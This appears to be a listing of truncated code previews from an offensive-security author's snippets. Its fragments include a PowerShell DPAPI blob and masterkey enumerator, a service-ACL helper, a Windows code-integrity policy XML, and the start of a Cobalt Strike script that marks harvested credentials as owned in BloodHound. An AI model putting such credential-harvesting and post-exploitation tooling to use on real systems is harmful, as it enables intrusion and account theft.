cube0x0

#!/usr/bin/python3
import hashlib
import os
import argparse
import base64
import pyDes
import gzip
import hmac
import requests

cube0x0

function Get-DPAPIBlobs {
    <#
    .SYNOPSIS
    Author: Cube0x0
    License: BSD 3-Clause
    .DESCRIPTION
    Enumerate DPAPI blobs and masterkeys
    #>
    [CmdletBinding()]
    Param()

cube0x0

#https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
Add-Type  @"
  [System.FlagsAttribute]
  public enum ServiceAccessFlags : uint
  {
      QueryConfig = 1,
      ChangeConfig = 2,
      QueryStatus = 4,
      EnumerateDependents = 8,
      Start = 16,

cube0x0

<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>10.0.0.0</VersionEx>
  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <Rules>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>
    <Rule>

cube0x0

popup credentials {
	item "Export As Owned" {
		callback($1);
	}
}

sub callback {
    local('$template')
    $template = "Invoke-Neo4jQuery -Query \"MATCH (n:User) WHERE n.name = 'REPLACEME' SET n.owned = True\" ";
	foreach $cred (credentials()) {